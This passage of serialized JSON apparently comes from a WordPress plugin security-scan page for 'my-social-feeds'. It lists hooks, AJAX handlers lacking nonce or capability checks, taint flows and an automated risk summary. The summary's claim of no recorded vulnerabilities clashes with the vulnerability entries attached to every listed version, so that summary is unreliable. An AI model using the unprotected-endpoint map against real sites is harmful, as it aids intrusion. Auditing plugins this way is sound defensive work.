rel=\"nofollow ugc\">Privacy Policy\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003C\u002Ful>\n","Keep your website content up to date and increase SEO by displaying all of your social media accounts, #hashtags in one place with customized design.",400,23913,82,22,"2025-04-21T10:37:00.000Z","6.8.5","7.4",[152,92,20,153,22],"facebook-feed","social-feed","https:\u002F\u002Fwww.powr.io\u002Fsocial-feed-website-app","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpowr-social-feed.2.1.0.zip",92,{"slug":158,"name":159,"version":160,"author":161,"author_profile":162,"description":163,"short_description":164,"active_installs":165,"downloaded":166,"rating":167,"num_ratings":128,"last_updated":168,"tested_up_to":169,"requires_at_least":170,"requires_php":24,"tags":171,"homepage":174,"download_link":175,"security_score":176,"vuln_count":13,"unpatched_count":13,"last_vuln_date":37,"fetched_at":29},"all-in-one-social-feeds","All in one Social Feeds","1.0.0","Cynob IT Consultancy","https:\u002F\u002Fprofiles.wordpress.org\u002Fnetattingo-technologies\u002F","\u003Cp>This plugin helps to display latest feeds from facebook, twitter,instagram, pinterest and youtube with tabs using a widget.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Features\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Widgets based\u003C\u002Fli>\n\u003Cli>Facebook feed\u003C\u002Fli>\n\u003Cli>Twitter feed\u003C\u002Fli>\n\u003Cli>Instagram feed\u003C\u002Fli>\n\u003Cli>Pinterest feed\u003C\u002Fli>\n\u003Cli>Youtube feed\u003C\u002Fli>\n\u003Cli>Tab View\u003C\u002Fli>\n\u003Cli>Easy to customize\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Required\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>The PHP allow_url_fopen setting must be enabled for the plugin.\u003C\u002Fli>\n\u003C\u002Ful>\n","This plugin helps to display latest feeds from facebook, twitter,instagram, pinterest and youtube with tabs using a widget.",20,4699,80,"2016-08-20T05:16:00.000Z","4.6.30","3.5.0",[152,20,172,23,173],"pintrest-feed","youtube-feed","http:\u002F\u002Fwww.netattingo.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-social-feeds.zip",85,{"attackSurface":178,"codeSignals":349,"taintFlows":364,"riskAssessment":392,"analyzedAt":397},{"hooks":179,"ajaxHandlers":273,"restRoutes":342,"shortcodes":343,"cronEvents":348,"entryPointCount":147,"unprotectedCount":109},[180,185,189,194,198,201,205,208,212,216,219,224,228,230,233,236,239,243,246,250,253,255,259,263,265,266,268,270],{"type":181,"name":182,"callback":182,"file":183,"line":184},"action","admin_head","freemius-lite\\inc\\Base\\FSActivate.php",29,{"type":181,"name":186,"callback":187,"file":183,"line":188},"admin_enqueue_scripts","enqueue_assets",30,{"type":181,"name":190,"callback":191,"priority":192,"file":183,"line":193},"admin_menu","add_opt_in_menu",10,33,{"type":181,"name":195,"callback":196,"file":183,"line":197},"admin_footer","opt_in_modal",38,{"type":181,"name":195,"callback":199,"file":183,"line":200},"initialize_opt_in",39,{"type":181,"name":202,"callback":203,"file":183,"line":204},"admin_notices","fs_admin_notice",44,{"type":181,"name":206,"callback":206,"file":207,"line":184},"init","freemius-lite\\inc\\Base\\FS_Lite.php",{"type":181,"name":206,"callback":209,"file":210,"line":211},"onInit","includes\\Instagram.php",32,{"type":181,"name":190,"callback":213,"file":214,"line":215},"adminMenu","includes\\menu\\admin-menu.php",11,{"type":181,"name":186,"callback":217,"file":214,"line":218},"adminEnqueueScripts",12,{"type":220,"name":221,"callback":222,"file":214,"line":223},"filter","parent_file","fixActiveParentMenu",18,{"type":220,"name":225,"callback":226,"file":214,"line":227},"submenu_file","fixActiveSubmenuMenu",19,{"type":181,"name":206,"callback":209,"file":229,"line":215},"includes\\Pinterest.php",{"type":181,"name":206,"callback":209,"priority":165,"file":231,"line":232},"includes\\post\\shortcode.php",8,{"type":220,"name":234,"callback":235,"priority":192,"file":231,"line":192},"manage_msfbp_posts_columns","manageLPBPostsColumns",{"type":181,"name":237,"callback":238,"priority":192,"file":231,"line":215},"manage_msfbp_posts_custom_column","manageBSBPostsCustomColumns",{"type":181,"name":240,"callback":241,"priority":242,"file":231,"line":218},"use_block_editor_for_post","useBlockEditorForPost",999,{"type":181,"name":186,"callback":244,"file":231,"line":245},"wp_admin_scripts",13,{"type":181,"name":247,"callback":248,"file":249,"line":165},"admin_init","handle_oauth_callback","includes\\TiktokAPI.php",{"type":181,"name":206,"callback":251,"file":249,"line":252},"refresh_tokens",21,{"type":181,"name":206,"callback":209,"file":254,"line":87},"my-social-feeds.php",{"type":181,"name":256,"callback":257,"file":254,"line":258},"enqueue_block_editor_assets","enqueueBlockEditorAssets",95,{"type":181,"name":260,"callback":261,"file":254,"line":262},"enqueue_block_assets","enqueueTiktokAssets",96,{"type":181,"name":260,"callback":244,"file":254,"line":264},97,{"type":181,"name":186,"callback":244,"file":254,"line":72},{"type":181,"name":195,"callback":267,"priority":192,"file":254,"line":26},"load_tiktok_script",{"type":181,"name":269,"callback":267,"priority":192,"file":254,"line":117},"wp_footer",{"type":220,"name":271,"callback":271,"priority":192,"file":254,"line":272},"plugin_action_links",101,[274,278,281,283,287,289,293,296,300,303,304,308,311,315,319,323,325,329,332,336,339],{"action":275,"nopriv":57,"callback":275,"hasNonce":276,"hasCapCheck":276,"file":183,"line":277},"fs_init",true,42,{"action":279,"nopriv":57,"callback":280,"hasNonce":57,"hasCapCheck":57,"file":210,"line":193},"ifbAjaxRequest","ajaxRequest",{"action":279,"nopriv":276,"callback":280,"hasNonce":57,"hasCapCheck":57,"file":210,"line":282},34,{"action":284,"nopriv":57,"callback":285,"hasNonce":57,"hasCapCheck":57,"file":210,"line":286},"ifbDeleteTransient","deleteTransient",35,{"action":284,"nopriv":276,"callback":285,"hasNonce":57,"hasCapCheck":57,"file":210,"line":288},36,{"action":290,"nopriv":57,"callback":291,"hasNonce":276,"hasCapCheck":57,"file":292,"line":218},"msfbp-get-instagram-access-token","msfbp_get_instagram_access_token","includes\\InstagramAccessTokenSave.php",{"action":294,"nopriv":57,"callback":295,"hasNonce":276,"hasCapCheck":57,"file":292,"line":245},"msfbp-set-instagram-access-token","msfbp_set_instagram_access_token_save",{"action":297,"nopriv":57,"callback":298,"hasNonce":276,"hasCapCheck":57,"file":292,"line":299},"msfbp-delete-instagram-access-token","msfbp_delete_instagram_access_token",14,{"action":301,"nopriv":57,"callback":302,"hasNonce":276,"hasCapCheck":57,"file":229,"line":218},"bPinterestAjaxRequest","bpinterest_ajaxRequest",{"action":301,"nopriv":276,"callback":302,"hasNonce":276,"hasCapCheck":57,"file":229,"line":245},{"action":305,"nopriv":57,"callback":306,"hasNonce":276,"hasCapCheck":57,"file":307,"line":245},"msfbp-get-pinterest-credentials","msfbp_get_pinterest_credentials","includes\\PinterestAccessTokenSave.php",{"action":309,"nopriv":57,"callback":310,"hasNonce":276,"hasCapCheck":57,"file":307,"line":299},"msfbp-set-pinterest-credentials","msfbp_set_pinterest_credentials",{"action":312,"nopriv":57,"callback":313,"hasNonce":276,"hasCapCheck":57,"file":307,"line":314},"msfbp-delete-pinterest-credentials","msfbp_delete_pinterest_credentials",15,{"action":316,"nopriv":57,"callback":317,"hasNonce":57,"hasCapCheck":57,"file":249,"line":318},"ttp_get_accounts","get_accounts",24,{"action":320,"nopriv":57,"callback":321,"hasNonce":276,"hasCapCheck":57,"file":249,"line":322},"ttp_tiktok_videos","get_videos",25,{"action":320,"nopriv":276,"callback":321,"hasNonce":276,"hasCapCheck":57,"file":249,"line":324},26,{"action":326,"nopriv":57,"callback":327,"hasNonce":276,"hasCapCheck":57,"file":249,"line":328},"ttp_tiktok_clear","clear_cache",28,{"action":330,"nopriv":57,"callback":331,"hasNonce":57,"hasCapCheck":57,"file":249,"line":184},"ttp_remove_account","remove_account",{"action":333,"nopriv":57,"callback":334,"hasNonce":276,"hasCapCheck":57,"file":335,"line":218},"msfbp-get-twitter-credentials","msfbp_get_twitter_credentials","includes\\TwitterUserNameIdSave.php",{"action":337,"nopriv":57,"callback":338,"hasNonce":276,"hasCapCheck":57,"file":335,"line":245},"msfbp-set-twitter-credentials","msfbp_set_twitter_credentials",{"action":340,"nopriv":57,"callback":341,"hasNonce":276,"hasCapCheck":57,"file":335,"line":299},"msfbp-delete-twitter-credentials","msfbp_delete_twitter_credentials",[],[344],{"tag":345,"callback":346,"file":231,"line":347},"msfbp-social-feeds","onAddShortcode",9,[],{"dangerousFunctions":350,"sqlUsage":351,"outputEscaping":353,"fileOperations":13,"externalRequests":232,"nonceChecks":358,"capabilityChecks":359,"bundledLibraries":360},[],{"prepared":13,"raw":13,"locations":352},[],{"escaped":354,"rawEcho":27,"locations":355},77,[356],{"file":231,"line":72,"context":357},"raw output",16,5,[361],{"name":362,"version":37,"knownCves":363},"Freemius",[],[365,383],{"entryPoint":366,"graph":367,"unsanitizedCount":13,"severity":382},"fs_init (freemius-lite\\inc\\Base\\FSActivate.php:68)",{"nodes":368,"edges":380},[369,374],{"id":370,"type":371,"label":372,"file":183,"line":373},"n0","source","$_POST",74,{"id":375,"type":376,"label":377,"file":183,"line":378,"wp_function":379},"n1","sink","update_option() [Settings Manipulation]",106,"update_option",[381],{"from":370,"to":375,"sanitized":276},"low",{"entryPoint":384,"graph":385,"unsanitizedCount":13,"severity":382},"\u003CFSActivate> (freemius-lite\\inc\\Base\\FSActivate.php:0)",{"nodes":386,"edges":390},[387,389],{"id":370,"type":371,"label":388,"file":183,"line":373},"$_POST (x2)",{"id":375,"type":376,"label":377,"file":183,"line":378,"wp_function":379},[391],{"from":370,"to":375,"sanitized":276},{"summary":393,"deductions":394},"The \"my-social-feeds\" plugin version 1.0.2 exhibits a generally good security posture, with strong adherence to secure coding practices in several key areas.  The complete absence of SQL injection vulnerabilities due to the exclusive use of prepared statements and the overwhelmingly proper output escaping (99%) are significant strengths.  Furthermore, the lack of any recorded vulnerabilities in its history suggests a well-maintained and historically secure codebase. Taint analysis also shows no critical or high-severity issues, reinforcing this positive impression.\n\nHowever, a notable concern lies in the plugin's attack surface.  With 22 total entry points, 6 of which lack authentication checks, there is a significant risk of unauthorized access or execution of unintended functionality. While nonce checks are present in 16 instances and capability checks in 5, the unprotected AJAX handlers represent a direct pathway for potential attacks if these handlers perform sensitive operations or expose information. The presence of the Freemius SDK also introduces a dependency that, if not properly managed or kept up-to-date, could pose a future risk, although no specific issues are highlighted in the provided data.\n\nIn conclusion, \"my-social-feeds\" v1.0.2 demonstrates commendable secure coding habits in its database and output handling. The primary weakness lies in its exposed attack surface, specifically the unprotected AJAX endpoints. Addressing these requires immediate attention to implement proper authentication and authorization checks on all AJAX handlers. The plugin's historical cleanliness in terms of CVEs is a positive indicator, but vigilance regarding the identified attack surface is paramount.",[395],{"reason":396,"points":192},"Unprotected AJAX handlers","2026-03-16T20:18:07.212Z",{"wat":399,"direct":413},{"assetPaths":400,"generatorPatterns":406,"scriptPaths":407,"versionParams":409},[401,402,403,404,405],"\u002Fwp-content\u002Fplugins\u002Fmy-social-feeds\u002Fpublic\u002Fcss\u002Ffancyapps.min.css","\u002Fwp-content\u002Fplugins\u002Fmy-social-feeds\u002Fpublic\u002Fcss\u002FjustifiedGallery.min.css","\u002Fwp-content\u002Fplugins\u002Fmy-social-feeds\u002Fpublic\u002Fjs\u002Ffancyapps.min.js","\u002Fwp-content\u002Fplugins\u002Fmy-social-feeds\u002Fpublic\u002Fjs\u002FjustifiedGallery.min.js","\u002Fwp-content\u002Fplugins\u002Fmy-social-feeds\u002Fpublic\u002Fjs\u002Fttp_script.js",[],[408],"https:\u002F\u002Fwww.tiktok.com\u002Fembed.js",[410,411,412],"my-social-feeds\u002Fpublic\u002Fjs\u002Ffancyapps.min.js?ver=","my-social-feeds\u002Fpublic\u002Fjs\u002FjustifiedGallery.min.js?ver=","my-social-feeds\u002Fpublic\u002Fjs\u002Fttp_script.js?ver=",{"cssClasses":414,"htmlComments":415,"htmlAttributes":416,"restEndpoints":417,"jsGlobals":418,"shortcodeOutput":423},[],[],[],[],[419,420,421,422],"window.ttpPatters","window.msfAuthorization","window.ttpData","window.msfbppipecheck",[],{"error":276,"url":425,"statusCode":426,"statusMessage":427,"message":427},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fmy-social-feeds\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":429,"versions":430},4,[431,437,445,453],{"version":6,"download_url":25,"svn_tag_url":432,"released_at":37,"has_diff":57,"diff_files_changed":433,"diff_lines":37,"trac_diff_url":434,"vulnerabilities":435,"is_current":276},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fmy-social-feeds\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fmy-social-feeds%2Ftags%2F1.0.2&new_path=%2Fmy-social-feeds%2Ftags%2F1.0.3",[436],{"id":33,"url_slug":34,"title":35,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":39},{"version":438,"download_url":439,"svn_tag_url":440,"released_at":37,"has_diff":57,"diff_files_changed":441,"diff_lines":37,"trac_diff_url":442,"vulnerabilities":443,"is_current":57},"1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fmy-social-feeds\u002Ftags\u002F1.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fmy-social-feeds%2Ftags%2F1.0.1&new_path=%2Fmy-social-feeds%2Ftags%2F1.0.2",[444],{"id":33,"url_slug":34,"title":35,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":39},{"version":446,"download_url":447,"svn_tag_url":448,"released_at":37,"has_diff":57,"diff_files_changed":449,"diff_lines":37,"trac_diff_url":450,"vulnerabilities":451,"is_current":57},"1.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fmy-social-feeds\u002Ftags\u002F1.0.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fmy-social-feeds%2Ftags%2F1.0.0&new_path=%2Fmy-social-feeds%2Ftags%2F1.0.1",[452],{"id":33,"url_slug":34,"title":35,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":39},{"version":160,"download_url":454,"svn_tag_url":455,"released_at":37,"has_diff":57,"diff_files_changed":456,"diff_lines":37,"trac_diff_url":37,"vulnerabilities":457,"is_current":57},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmy-social-feeds.1.0.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fmy-social-feeds\u002Ftags\u002F1.0.0\u002F",[],[458],{"id":33,"url_slug":34,"title":35,"severity":40,"cvss_score":41,"vuln_type":43,"patched_in_version":39}]